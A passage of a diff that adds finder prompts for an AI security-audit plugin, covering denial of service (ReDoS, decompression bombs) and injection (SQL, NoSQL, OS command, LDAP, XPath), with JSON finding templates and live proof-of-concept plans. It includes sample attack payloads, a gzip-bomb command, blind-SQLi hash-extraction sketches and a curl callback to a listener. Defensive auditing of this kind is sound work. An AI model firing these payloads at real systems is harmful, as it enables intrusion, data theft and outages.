+counts, and filenames; uploaded archive entry metadata (declared uncompressed
+size, entry count, nesting); JSON/XML/YAML/GraphQL documents and their **depth**;
+message-queue/webhook payloads; any numeric param later used as a count, size,
+loop bound, dimension, or iteration cost; **DB rows originally user-set** then
+fed into an expensive op (stored/second-order amplification).
+
+**Taint SINKS** (the cost-amplifying op): the calls in §2 where attacker control
+of input *length, depth, count, ratio, or a numeric magnitude* directly sets the
+work performed — regex match over an attacker string with a super-linear pattern;
+allocation/loop/recursion whose extent is input-derived; decompression whose
+output size or entry count is attacker-set; full-body read with no cap.
+
+Vulnerable patterns to confirm:
+
+- **ReDoS — catastrophic backtracking.** A backtracking-engine regex (PCRE,
+  Oniguruma/Ruby, Java `java.util.regex`, JS, Python `re`, .NET, `fancy-regex`)
+  applied to an attacker-controlled, length-unbounded subject, where the pattern
+  has **nested/overlapping quantifiers** that create exponential or polynomial
+  paths: `(a+)+`, `(a*)*`, `(a|a)*`, `(.*)*`, `(\w+\s?)*`, `(\d+)+$`, alternations
+  that overlap (`(foo|fo)+`), or a quantified group followed by a hard-to-satisfy
+  anchor/char so the engine retries every split (`^(\w+)+@`, `^(.+)+#$`). The
+  classic tell is a quantifier applied to a sub-expression that itself can match
+  the same input multiple ways, then a failing tail forcing backtracking. Confirm
+  the engine actually backtracks (see §4 for the linear-engine carve-out) and the
+  subject is attacker-controlled and not length-capped before the match.
+- **Unbounded allocation from input.** `Array.new(n)` / `make([]byte, n)` /
+  `Buffer.alloc(n)` / `vec![0; n]` / `"x" * n` / `str_repeat($s,$n)` where `n`
+  comes from input with no upper bound — one request allocates GBs.
+- **Unbounded / input-bounded loop or recursion.** `n.times`, `for i in
+  range(n)`, `while` keyed off input, recursive descent over attacker-nested
+  data (deep JSON/XML/YAML) hitting stack/CPU limits; pagination `limit` with no
+  ceiling pulling the whole table.
+- **Decompression bomb.** Decompressing attacker data without bounding the
+  *output* — a few KB gzip → GBs; `extractall()`/`extractTo()`/`io.Copy` from an
+  archive trusting the entry's declared size; nested archives; high-ratio
+  streams. The tell: decompress/extract with no `LimitReader`/max-output check
+  and no per-entry/total-size/entry-count cap.
+- **XML/markup expansion.** DTD entity expansion (billion laughs), YAML
+  anchors/aliases, GraphQL query depth/alias amplification, template loops driven
+  by input count.
+- **Missing limit on an expensive op.** Crypto cost (KDF rounds/key size),
+  image dimensions/pixel count, per-item process/thread/FD spawning, external
+  fan-out — all with the magnitude attacker-set and no cap.
+- **Full-body read before validation.** Server buffers the entire request body
+  (`ReadAll`/`body.read`/`get_data()`) before — or without — a size limit, so a
+  large body OOMs or pins memory regardless of later checks.
+
+Amplification matters: prefer findings where ONE small request causes large work
+(super-linear regex, decompression ratio, depth recursion) or where a trivially
+repeatable request has no per-client cap; a strictly linear cost that merely
+scales with body size already capped by a body limit is weaker.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Linear-time regex engine.** Go `regexp` and Rust `regex` use RE2/automata —
+  **no catastrophic backtracking by construction**; a "scary" pattern there is
+  NOT ReDoS (unless `fancy-regex`/cgo PCRE is used — check the import). Likewise
+  .NET with a `RegexOptions.NonBacktracking` or `MatchTimeout` set, or any engine
+  where the match runs under an enforced timeout (`Regexp.timeout=` in Ruby 3.2+,
+  JS with a timeout wrapper, Java pattern run under a watchdog). A timeout that
+  actually bounds the match is a mitigation.
+- **Pattern is not super-linear, or subject is bounded.** A pattern with no
+  nested/overlapping quantifiers (linear) is fine even on a backtracking engine.
+  And even a bad pattern is not exploitable if the subject is **hard-length-capped
+  before the match** to a small constant (e.g. validated `length <= 64`, a route
+  segment, an enum) — the worst case is then trivially small. Verify the cap is
+  enforced *before* the regex runs.
+- **Effective size limit on the path.** A body/upload limit applied before the
+  expensive parse/alloc — `http.MaxBytesReader`, `express.json({limit})`,
+  `client_max_body_size`, `MultipartConfig.maxRequestSize`,
+  `DATA_UPLOAD_MAX_MEMORY_SIZE`, `RequestBodyLimitLayer`, Rack
+  `Rack::Utils.multipart_part_limit` / a body-limit middleware — that caps input
+  small enough that the downstream op cost is bounded. The limit must precede or
+  stream-bound the op (a check *after* a full `ReadAll` does not save memory).
+- **Bounded / validated magnitude.** The numeric drive (`n`, `limit`, `depth`,
+  `count`) is clamped to a sane max (`min(n, MAX)`, validated range, enum,
+  `LIMIT` capped server-side, pagination max enforced) before driving the loop/
+  alloc — exploitation closed.
+- **Bounded decompression.** Output is limited — `io.LimitReader`/`LimitedReader`
+  around the decompressor, a max-output byte counter that aborts, per-entry and
+  total-size and entry-count caps, ratio checks, or the library enforces them
+  (e.g. a configured max-inflate). Trusting only the archive's *declared* size is
+  NOT a mitigation (attacker sets it).
+- **Disabled XML expansion.** External entities/DTD turned off
+  (`FEATURE_SECURE_PROCESSING`, `disallow-doctype-decl`, `resolve_entities:
+  false`, `defusedxml`, `XXE`-safe parser config), YAML `safe_load`, JSON/serde
+  parser with an enforced recursion/depth limit, GraphQL depth/cost-limit
+  plugin in the schema — expansion bounded.
+- **Streaming with backpressure + bound.** The op streams in fixed chunks AND
+  enforces a total-bytes ceiling (not just "it streams"); pure streaming without
+  a cap still lets unbounded total work through — not a mitigation by itself.
+- **Per-request cost is constant / trivially small.** The input only selects
+  among a fixed small set, the loop bound is a constant, or the allocation is
+  capped by the type/protocol — no attacker-scalable cost.
+- **Authz / rate-limit / cost ceiling that bounds the abuse** (per-route rate
+  limit, quota, WAF body cap, gateway timeout that kills the request) may *lower*
+  severity but is NOT a parser-level fix; a CPU-pinning ReDoS within a single
+  request still wedges a worker before any rate limit triggers — note it, keep
+  the finding, adjust severity.
+
+If a guard exists but is bypassable — a length cap applied to the wrong field or
+after the regex, a body limit on JSON but not on the gzip/multipart path, a depth
+limit that misses alias expansion, a max checked against the *declared* not
+*actual* decompressed size, `min(n, MAX)` where MAX is itself huge — it is NOT a
+mitigation; flag it and name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable, high-amplification: a single small
+  request pins a CPU core indefinitely (exponential ReDoS), OOMs the process
+  (unbounded alloc / decompression bomb), or exhausts disk/FDs, taking down a
+  shared worker/instance with no per-request bound — full availability loss for
+  all users from one cheap request.
+- **High** — authenticated or realistically-conditioned, still high impact:
+  polynomial ReDoS or unbounded alloc reachable behind a login, decompression
+  bomb on an authenticated upload, depth/recursion crash; or unauth but requiring
+  a handful of concurrent requests to saturate (no per-client cap). Degrades or
+  downs the service under attainable load.
+- **Medium** — constrained amplification or partial mitigation: cost scales but
+  only linearly with a body that has a generous-but-finite cap; ReDoS on a field
+  with a loose length cap that still allows seconds-not-minutes of CPU; an
+  unbounded loop bounded indirectly (downstream timeout); single-tenant/local
+  impact only.
+- **Low/Info** — theoretical cost growth with a small effective ceiling, a bad
+  regex on a provably short subject, or a missing limit defended by an effective
+  upstream gateway/WAF cap — usually downgrade or drop per §4.
+
+Note effective per-request work and whether one request or many are needed in
+`rationale`; a single-request worker-wedge is worse than a flood-only DoS.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "dos-redos-001",
+  "title": "Catastrophic-backtracking ReDoS in unauth email validator on request body",
+  "vuln_class": "dos-redos",
+  "owasp": "A06:2025",
+  "cwe": "CWE-1333",
+  "asvs": "V2",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/validators/email.ts",
+  "line": 12,
+  "end_line": 14,
+  "code_excerpt": "const EMAIL = /^([a-zA-Z0-9_\\.\\-]+)+@([a-zA-Z0-9_\\.\\-]+)+\\.([a-zA-Z]{2,})$/;\nexport const valid = (s: string) => EMAIL.test(s);",
+  "source": "req.body.email — POST /signup (no auth); body length not capped before validation (express.json() has no limit option set)",
+  "sink": "EMAIL.test(s) — V8 RegExp (backtracking engine) over attacker-controlled, length-unbounded subject; nested quantifiers ([...]+)+ create exponential backtracking",
+  "data_flow": "req.body.email -> valid(s) -> EMAIL.test(s); no length check between source and sink; express.json() default has no `limit`, so subject is unbounded; engine is V8 (backtracking), not RE2",
+  "sanitizers_checked": "no length cap on email before match; express.json() called without {limit}; no regex timeout (Node has none by default); pattern IS super-linear (overlapping ([a-zA-Z0-9_.-]+)+ groups + failing '@'/tail forces exponential retries); not Go/Rust linear engine",
+  "rationale": "Reachable from the unauth signup route. A subject like 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!' (30+ 'a' then a non-matching char) forces the two nested + groups to try every partition, pinning the event loop for seconds→minutes on one request, blocking the single-threaded Node worker for ALL clients. Same pattern reused at validators/username.ts:8.",
+  "exploit_sketch": "POST /signup {\"email\":\"<40 'a's>!\"} — each request blocks the event loop ~exponentially in the prefix length; a few requests wedge the whole instance.",
+  "dynamic_poc_plan": "Send the signup request with email = 'a'*N + '!' for N=20,25,30; measure response latency. Latency roughly doubling per +1 in N (sub-second -> many seconds) confirms exponential backtracking; concurrently a benign request to any route also hangs, proving event-loop starvation.",
+  "proposed_fix": "Bound attacker-controlled work in the email-validation path so a single request can't blow up CPU: move to a linear-time matching approach and/or cap subject length before matching, and enforce a request-body limit. Exact engine/pattern/limits and the username-validator follow-up are left to the implementing engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces source→sink and states the amplification
+mechanism — *why* the cost is super-linear/unbounded (nested-quantifier
+backtracking, input-set allocation size, decompression ratio, recursion depth) —
+and names any guard encountered and why it fails. `sanitizers_checked` is the FP
+guard made explicit: name the regex engine (backtracking vs RE2/linear), confirm
+the subject is unbounded (no length cap before match) or the magnitude
+unclamped, and list each §4 control as absent or, if present, name the exact
+bypass. A finding without an untrusted source reaching a genuinely cost-blowing
+sink — or one on a linear engine, or with an effective pre-op limit — is not a
+finding. Pick `cwe`: 1333 ReDoS, 770 alloc-without-limit (incl. decompression/
+body), 834 excessive iteration/recursion, 400 generic uncontrolled consumption.
+Use `status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/subject-boundedness is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running service does *attacker-scalable* work — measure cost
+versus a control and show it blows up. Pick the method matching the sink:
+
+1. **ReDoS — latency-scaling oracle.** Against the live endpoint, send the
+   malicious subject at increasing sizes `N` (e.g. `'a'*N` + a tail char that
+   fails the pattern). **Observed proof** = response latency grows
+   super-linearly in `N` (exponential: ~doubles per +1; polynomial: ~N^2) — a
+   benign equal-length subject returns fast, the crafted one takes seconds→
+   minutes. For single-threaded runtimes (Node, Ruby/MRI worker, Python
+   sync worker), also fire one malicious request and concurrently a trivial
+   request to any route: the trivial one hanging proves worker/event-loop
+   starvation (whole-instance DoS, not just the one request).
+2. **Unbounded allocation / loop — memory or time oracle.** Send the request
+   with a large `n`/`count`/`depth` (e.g. `?limit=100000000`, deeply nested
+   JSON). **Observed proof** = process RSS spikes toward the limit / OOM-kill,
+   or the request hangs/times out while a control with small `n` returns
+   instantly; for recursion, a deep-nesting payload triggers a stack overflow /
+   500. Watch container memory or the process to confirm allocation tracks `n`.
+3. **Decompression bomb — output-size oracle.** Upload (or send as
+   `Content-Encoding: gzip`) a small high-ratio payload — e.g. a few-KB gzip that
+   inflates to GBs, or a nested zip. **Observed proof** = the server's memory/
+   disk balloons far beyond the request size, or it OOMs/times out, while the
+   on-wire payload is tiny — proving output is not bounded. (Generate a bomb:
+   `dd if=/dev/zero bs=1M count=1024 | gzip > bomb.gz`, or a 42.zip-style nested
+   archive.)
+4. **XML/markup expansion — amplification oracle.** Post a billion-laughs DTD,
+   a YAML alias bomb, or a deeply nested / heavily aliased GraphQL query.
+   **Observed proof** = CPU/memory spike and a hang/OOM disproportionate to the
+   tiny request, while a flat equivalent returns instantly.
+
+Establish a baseline (control request, normal latency/RSS) first, then the
+attack, and report the delta — the *ratio* of cost to input size is the proof.
+When a partial guard exists, run the bypass: subject length just over the cap,
+the un-limited content path (gzip vs JSON), magnitude just under a too-high MAX,
+nesting/alias depth past a missing limit. Record the exact request, the
+baseline, and the observed delta in the `Repro` object (`reproduced`,
+`method:"live-exploit"`, `poc`, `observed`, `impact`); note worker-starvation
+in `notes` if a concurrent benign request also hung. If the app can't be run,
+fall back to a focused unit test that drives the sink (the regex, the
+decompressor, the loop) with the payload and asserts the blow-up
+(`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/injection.md b/plugins/security/prompts/finders/injection.md
new file mode 100644
index 0000000..abef088
--- /dev/null
+++ b/plugins/security/prompts/finders/injection.md
@@ -0,0 +1,300 @@
+<!--
+FINDER PROMPT — injection. You are a fresh-context auditor hunting ONE class:
+Injection (SQL / NoSQL / OS command / LDAP / XPath / ORM raw fragments). Read
+the target's code; emit finding objects. Signal discipline (AGENTS.md) is
+binding: only a REACHABLE untrusted-input → interpreter sink, where the input
+crosses out of the data plane into the command/query structure AND no effective
+parameterization/escaping/allowlist sits on the path, is a finding. No
+defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — Injection (SQL/NoSQL/OS/LDAP) (`injection`)
+
+**Class key:** `injection` · **OWASP:** A05:2025 · **CWE:** CWE-89 (SQL) /
+CWE-78 (OS) / CWE-943 (NoSQL/query-language) / CWE-90 (LDAP) / CWE-74 (generic) ·
+**ASVS:** V1/V2
+
+## 1. Objective
+
+Find places where untrusted input is concatenated/interpolated into a string
+that an interpreter parses as **structure** — a SQL/NoSQL query, an OS shell
+command, an LDAP/XPath filter — instead of being passed as an inert bound
+parameter. The bug is the attacker escaping the data plane into the command
+plane; the fix is almost always parameterization or a structural builder.
+
+## 2. Where to look
+
+Entry points where a request value reaches a query/command builder or
+interpreter:
+
+- **Data-access layers:** repositories, DAOs, `*_repository`, `models/`,
+  `db/`, query objects, "search"/"filter"/"report" endpoints that build WHERE
+  clauses, `ORDER BY`/`LIMIT`/column names from params (these can't be bound —
+  high-risk), admin SQL/console features, CSV/report exporters, GraphQL
+  resolvers translating filters to SQL, dynamic `IN (...)` list builders.
+- **OS command surfaces:** image/video/PDF processing (ffmpeg, imagemagick,
+  ghostscript, libreoffice), archive/zip handling, git/scm wrappers, DNS/whois/
+  ping/traceroute "network tools", backup/restore, shell-out to CLI utilities,
+  templating that pipes to a renderer, `Makefile`/script runners, cron/job
+  payloads that exec.
+- **NoSQL surfaces:** Mongo/Mongoose/Couch/DynamoDB/Elasticsearch query
+  builders that accept request JSON directly as the filter object, `$where`/
+  JS-eval queries, Redis `EVAL`, aggregation pipelines built from input.
+- **Directory / XML surfaces:** LDAP auth & user-search (bind/search filters),
+  SAML/SCIM lookups, XPath over XML configs/SOAP, `XPathExpression` built from
+  input.
+- **ORM escape hatches:** raw-SQL methods, `.where("...#{x}...")` string forms,
+  `find_by_sql`, `Sequel.lit`, `db.Raw`, `queryRaw`, `entityManager
+  .createQuery` with string concat, Hibernate HQL concat, `.extra()`/`.raw()`.
+
+Route/handler param signals to grep: `q`, `query`, `search`, `filter`, `sort`,
+`order`, `order_by`, `column`, `field`, `table`, `name`, `id`, `email`, `host`,
+`cmd`, `file`, `path`, `format`, `dn`, `uid`, `username` — anywhere these land
+in a string later handed to a DB driver, a shell, or an LDAP/XPath API.
+
+Per-language SINK signals:
+
+- **Crystal:** `db.query("...#{x}...")`, `db.exec`, `db.scalar` with
+  interpolation (the `?`/`$1` arg form is safe); `Process.run(cmd, shell: true)`,
+  `` `#{x}` `` backticks, `system`.
+- **Ruby:** `ActiveRecord` `where("name = '#{x}'")`, `find_by_sql("..#{x}")`,
+  `exec_query`, `connection.execute`, `order(params[:sort])`,
+  `Sequel.lit`/`db["..#{x}"]`; `` `#{x}` ``, `system("..#{x}")`,
+  `%x{#{x}}`, `Open3.capture2("sh","-c", "..#{x}")`, `Kernel.exec`;
+  Mongo `collection.find(params)`; `Net::LDAP::Filter.construct("..#{x}")`.
+- **Node/TS:** `db.query("SELECT ... " + x)`, template-literal SQL
+  `` db.query(`... ${x}`) `` (pg/mysql2), Sequelize `sequelize.query(\`..${x}\`)`
+  / `literal()`, Knex `.whereRaw(\`..${x}\`)`, Prisma `$queryRawUnsafe(x)` /
+  `$executeRawUnsafe`, TypeORM `createQueryBuilder().where("x = " + v)`;
+  `child_process.exec(\`..${x}\`)`, `execSync`, `spawn(cmd, {shell:true})`;
+  Mongo `Model.find(req.query)` / `$where: req.body.js`; `ldapjs` search filter
+  built by concat.
+- **Python:** `cursor.execute("... %s" % x)` / `.execute(f"...{x}")` /
+  `"..."+x` (the `(sql, params)` 2-arg form is the safe one), SQLAlchemy
+  `text("..."+x)` / `.from_statement`, Django `.raw("..%s"%x)` / `.extra()` /
+  `RawSQL`; `os.system`, `subprocess.run(cmd, shell=True)`,
+  `subprocess.Popen(..., shell=True)`, `os.popen`, `commands.getoutput`;
+  `pymongo` `coll.find(request.json)` / `$where`; `ldap3` filter concat,
+  `lxml`/`etree` `xpath("..."+x)`.
+- **Go:** `db.Query(fmt.Sprintf("...%s", x))` / `db.Exec("..."+x)` (the
+  `(query, args...)` placeholder form is safe), `gorm` `.Raw(...+x)` /
+  `.Where("col = "+x)`, `sqlx` `.Queryx` with concat; `exec.Command("sh","-c",
+  "..."+x)`, `exec.Command("bash","-lc", x)`; Mongo `bson.M` built from request
+  with operator-bearing keys.
+- **PHP:** `mysqli_query($c, "...$x")`, `$pdo->query("...".$x)` (vs prepared
+  `$pdo->prepare(...).execute([...])`), `$wpdb->query("...$x")` (vs
+  `$wpdb->prepare`), Laravel `DB::raw`/`whereRaw("..$x")` /
+  `DB::select("..$x")`; `exec`, `shell_exec`, `system`, `passthru`, `popen`,
+  `` `$x` ``, `proc_open`; `ldap_search($c, $base, "(uid=$x)")`.
+- **Java:** `Statement.executeQuery("..."+x)` / `createStatement().execute`
+  (vs `PreparedStatement` `?`), `jdbcTemplate.queryForObject("..."+x)`,
+  Hibernate `createQuery("from U where name='"+x+"'")` / `createNativeQuery`;
+  `Runtime.getRuntime().exec(...+x)`, `ProcessBuilder("sh","-c", x)`;
+  `ctx.search(base, "(uid="+x+")", ...)` (JNDI/LDAP),
+  `xpath.compile("//user[@id='"+x+"']")`.
+- **Rust:** `sqlx::query(&format!("...{}", x))` (vs `sqlx::query!`/`.bind`),
+  `diesel::sql_query(format!(..))`, `rusqlite` `conn.execute(&format!(..))`
+  (vs params), `tokio_postgres` format-string query;
+  `Command::new("sh").arg("-c").arg(x)`, `std::process::Command` with a
+  shell wrapper.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP query/body/path/header/cookie values, JSON
+fields, multipart fields & filenames, GraphQL args, message-queue/webhook
+payloads, file contents being parsed, **and DB rows that were originally
+user-set** (second-order/stored injection — value written safely, later
+concatenated into a new query). For NoSQL specifically, an entire request object
+(`req.query`, `request.json`) passed as a filter is itself a source because its
+*keys* may be operators (`$gt`, `$ne`, `$where`, `$regex`).
+
+**Taint SINKS** (dangerous op): the language-specific calls in §2 where the
+tainted value is placed in the **structural** part of the string/object —
+i.e. concatenated/interpolated/format-substituted into SQL/HQL/command/filter
+text, OR supplied as a NoSQL filter whose operator keys are attacker-controlled,
+OR used as a SQL identifier (table/column/`ORDER BY`/direction) that cannot be
+bound.
+
+Vulnerable patterns to confirm:
+
+- **String-built SQL:** any concatenation/interpolation/`Sprintf`/`%`/f-string/
+  template-literal producing query text from a source. The tell is that the
+  driver's placeholder API (`?`, `$1`, `:name`, `%s`+params tuple) is *not* used
+  for that value.
+- **Identifier injection (un-bindable):** `ORDER BY #{params[:sort]}`,
+  `SELECT #{col}`, dynamic table name. Placeholders bind *values*, never
+  identifiers — so this needs an allowlist, and concat here is exploitable even
+  when value params elsewhere are bound. Common false-safe assumption.
+- **OS command via shell:** input reaching a sink that spawns through a shell
+  (`shell:true`, `sh -c`, backticks, `os.system`, `exec(string)` where the
+  string is parsed by `/bin/sh`). Metacharacters `; | & $() \`\` > <` break out.
+  Even argv-style is unsafe if the binary itself splits/globs the arg or the
+  arg starts with `-` (argument injection, e.g. `--upload-file`, `-o`).
+- **NoSQL operator injection:** `Model.find(req.query)` where a client sends
+  `{"password":{"$ne":null}}` or `username[$regex]=^admin`; `$where`/`$function`
+  with a string from input (server-side JS eval); Mongo aggregation `$expr`
+  built from input.
+- **LDAP filter injection:** `(&(uid=#{user})(...))` with `user="*)(uid=*"` →
+  auth bypass / filter rewrite; DN built by concat enabling base/scope change.
+- **XPath injection:** `//user[name/text()='`+x+`']` with `x="' or '1'='1"`.
+- **ORM raw fragments:** the `*Unsafe`/`raw`/`lit`/`sql_query`/`whereRaw`/`.extra`
+  family fed a concatenated string. The safe sibling (`query!`, `$queryRaw`
+  tagged template, parameterized `whereRaw('?', [x])`) usually exists right
+  beside it — confirm which one is used.
+- **Second-order:** value stored via a parameterized write, then read back and
+  concatenated into a later query/command. Trace the read site, not just writes.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Parameterized / prepared query:** the value rides in the driver's bind slot,
+  not the SQL text — `?`/`$1`/`:name` with a separate args array/tuple, JDBC
+  `PreparedStatement.setX`, `cursor.execute(sql, params)` 2-arg form, pg/mysql2
+  `query(text, values)`, Prisma `$queryRaw\`...${x}\`` *tagged template*
+  (auto-parameterized — distinct from `$queryRawUnsafe`), sqlx `query!`/`.bind`,
+  Go `db.Query(q, args...)`, Sequel/AR placeholder hashes & array conditions
+  (`where("a = ?", x)`, `where(name: x)`). This is the gold standard — if the
+  tainted value is bound, it is NOT a finding regardless of surrounding concat.
+- **ORM builder with structured args:** `where(hash)`, query-builder methods
+  passing values as params, ActiveRecord/Sequel/Ecto/Django ORM expressions that
+  emit binds. Only the *raw* escape hatches are suspect.
+- **Argv exec without a shell:** `subprocess.run([bin, arg], shell=False)`,
+  `execFile`/`spawn(bin, [args])` with `shell:false`/default, Go
+  `exec.Command(bin, arg1, arg2)` (no `sh -c`), Ruby `system(bin, arg1)` array
+  form, `ProcessBuilder` with separate args — metacharacters are inert. (Still
+  flag if argument injection applies: arg is attacker-controlled, begins with
+  `-`, and the program treats leading-dash args as options.)
+- **Identifier allowlist:** dynamic table/column/`ORDER BY`/direction mapped
+  through a fixed whitelist or enum (`{"name"=>"name","date"=>"created_at"}`,
+  `sort in ALLOWED`), so the raw string never reaches the query — safe.
+- **NoSQL with typed/cast input:** input coerced to a scalar (`String(x)`,
+  schema-validated to a primitive, Mongoose `runValidators` + strict schema, or
+  explicit `{$eq: x}`) before use, or query keys are server-defined constants
+  and only values come from input — operator injection closed. `sanitize`/
+  `mongo-sanitize`/`express-mongo-sanitize` stripping `$`/`.` keys counts if
+  applied on the path.
+- **LDAP/XPath escaping:** values passed through a real escaper —
+  `Net::LDAP::Filter.escape`, `ldap3`/`ldapjs` filter *builders* (not concat),
+  Java `Filter`/`encodeForLDAP` (ESAPI), XPath variable binding
+  (`XPathVariableResolver`/`setVariable`) instead of string concat — safe.
+- **Value provably not attacker-influenced:** a hardcoded constant, an
+  operator/config-set value, an internal enum, or a numeric value already
+  cast/validated to an integer (`Integer(x)` that raises, `parseInt` + range
+  check, typed route param `:id(\\d+)`) such that no SQL metacharacter survives.
+  A cast to int that *silently* coerces or a regex that still allows quotes is
+  NOT a mitigation.
+- **DB-side allowlist / least-priv that nullifies impact** is NOT a parser-level
+  fix — do not credit it as a sanitizer; at most it lowers severity. Note it,
+  but the injection is still a finding.
+
+If a guard exists but is bypassable (escaping the wrong context, a denylist of
+metacharacters rather than parameterization, `replace("'","''")` that misses
+backslash/`--`/Unicode, casting that silently truncates, mongo-sanitize applied
+to the wrong object), it is NOT a mitigation — flag it and name the bypass in
+`sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated, reachable injection into a primary datastore
+  with high impact: full SQL/NoSQL query control (data exfil/auth bypass/write),
+  OS command execution (RCE), `$where`/`EVAL` server-side code exec, or LDAP
+  bind-filter injection yielding auth bypass. Attacker controls query/command
+  structure with no effective sanitizer.
+- **High** — authenticated or realistically-conditioned injection with
+  significant impact: read/modify other tenants' data, blind boolean/time-based
+  SQLi, identifier/`ORDER BY` injection that still leaks data via error/timing,
+  OS command behind an authn wall, second-order injection with broad reach.
+- **Medium** — constrained injection: limited to a small surface (single column,
+  numeric-ish field with partial filtering), blind with a weak oracle, or a
+  partial mitigation that narrows but doesn't close exploitation; LDAP/XPath
+  injection with limited disclosure.
+- **Low/Info** — injection into a non-security-relevant local interpreter with
+  no cross-trust impact, or a theoretical concat where the value is effectively
+  constrained to a safe charset — usually downgrade or drop per §4.
+
+Second-order/stored injection keeps the severity of its eventual sink; note the
+persistence and the write→read path in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "injection-001",
+  "title": "Unauthenticated SQLi via sort param interpolated into ORDER BY",
+  "vuln_class": "injection",
+  "owasp": "A05:2025",
+  "cwe": "CWE-89",
+  "asvs": "V1",
+  "severity": "high",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/repositories/user_repository.rb",
+  "line": 33,
+  "end_line": 35,
+  "code_excerpt": "User.order(\"#{params[:sort]} #{params[:dir]}\").limit(50)",
+  "source": "params[:sort], params[:dir] — GET /users query string, route has no auth filter",
+  "sink": "ActiveRecord .order(\"...\") — raw string spliced into the SQL ORDER BY clause (identifiers cannot be bound)",
+  "data_flow": "params[:sort]/params[:dir] -> string interpolation -> .order(raw) -> generated SQL; values reach the query structure, not a bind slot; no allowlist between source and sink",
+  "sanitizers_checked": "no identifier allowlist/enum mapping for sort or dir; not parameterized (ORDER BY identifiers are not bindable so binds wouldn't help); no cast; AR does not escape .order() string args",
+  "rationale": "Reachable from unauth route; sort=\"(CASE WHEN (SELECT ...) THEN name ELSE id END)\" enables boolean/time-based blind extraction of arbitrary columns. Same pattern at report_repository.rb:71 (group_by).",
+  "exploit_sketch": "GET /users?sort=(SELECT CASE WHEN (SUBSTR(password,1,1)='a') THEN name ELSE id END)&dir=asc -> row ordering changes oracle-style, leaking the hash char by char.",
+  "dynamic_poc_plan": "Send a sort payload with a SLEEP/pg_sleep CASE subquery; observe response-time delta vs a benign sort to confirm the subquery executes inside the live DB query.",
+  "proposed_fix": "Identifiers can't be bound, so the sort/dir inputs must be constrained to a known-good set of columns and directions rather than reaching the SQL structure as raw strings; this closes the data-plane escape while leaving the exact mechanism to the implementer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source→sink and states why the
+value lands in the command plane (concat/interpolation/identifier) rather than a
+bind slot, naming any guard encountered and why it fails. `sanitizers_checked`
+is the FP guard made explicit — list each §4 control and state it is absent or,
+if present, name the exact bypass (e.g. "quote-doubling only, backslash escapes
+the closing quote"). A finding without an untrusted source reaching a real
+interpreter sink in the structural position is not a finding. Pick `cwe` by
+interpreter: 89 SQL, 78 OS, 943 NoSQL/query, 90 LDAP, 74 generic/other. Use
+`status:"likely"` for a proven static trace, `"confirmed"` only after dynamic
+repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running interpreter parses attacker input as structure, not
+data. Pick the oracle matching the sink:
+
+1. **SQL — error/boolean/time oracle.** Against the live endpoint, send a
+   payload that changes the *query's truth or shape*:
+   - **Error:** inject an unbalanced quote (`'`) or type-clash; **observed proof**
+     = a DB syntax error surfaced/logged (500 with SQL fragment, driver error)
+     that a bound parameter could never produce.
+   - **Boolean:** compare `?id=1 AND 1=1` vs `?id=1 AND 1=2` — **observed proof**
+     = the two requests return different result sets (one row vs none).
+   - **Time-blind:** inject `;SELECT pg_sleep(5)`/`SLEEP(5)`/`WAITFOR DELAY`;
+     **observed proof** = response latency tracks the requested delay (5s vs
+     control), proving the subquery ran in the DB.
+2. **OS command — out-of-band or marker.** Inject a benign side-effect:
+   `; sleep 5`, `$(sleep 5)`, `| id`, or `; curl http://<listener>/<nonce>`.
+   **Observed proof** = the listener records the nonce hit from the server host,
+   OR the response/timing reflects the injected command (latency delta, `id`/
+   `uname` output echoed). Prefer the OOB callback for blind cases.
+3. **NoSQL — operator oracle.** Send `username[$ne]=x` / JSON
+   `{"$gt":""}` / `{"$where":"sleep(5000)||true"}`; **observed proof** = an
+   auth/login that should fail now succeeds (returns a session/record), or the
+   `$where` sleep induces a measurable delay — both impossible if the value were
+   treated as a scalar.
+4. **LDAP / XPath — filter-rewrite oracle.** Send `*)(uid=*` (LDAP) or
+   `' or '1'='1` (XPath); **observed proof** = a lookup that should match one or
+   zero entries now returns all/expanded results, or a login succeeds without
+   valid credentials.
+
+Run the relevant bypass checks when a partial guard exists: quote-escaping
+evasion (backslash, double-encoding, Unicode quote), comment terminators
+(`--`, `#`, `/* */`), stacked queries if the driver allows, argv argument
+injection (leading `-`/`--option`), and mongo-sanitize bypass (nested/`.`-keyed
+operators). Record the exact request and observed evidence in the `Repro`
+object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`).
+A time/OOB confirmation alone proves injection — set `method:"live-exploit"`
+and note blindness in `notes`. If the app can't be run, fall back to a focused
+unit test that drives the sink with the payload (`method:"unit-test"`).
diff --git a/plugins/security/prompts/finders/logging-errors.md b/plugins/security/prompts/finders/logging-errors.md
new file mode 100644
index 0000000..e3851b9
--- /dev/null
+++ b/plugins/security/prompts/finders/logging-errors.md
@@ -0,0 +1,355 @@
+<!--
+FINDER PROMPT — logging-errors. You are a fresh-context auditor hunting ONE
+class: Logging, Error & Exception Handling. Read the target's code; emit finding
+objects. Signal discipline (AGENTS.md) is binding. This class has TWO finding
+shapes, both needing a concrete sink: (A) DISCLOSURE — a tainted/sensitive value
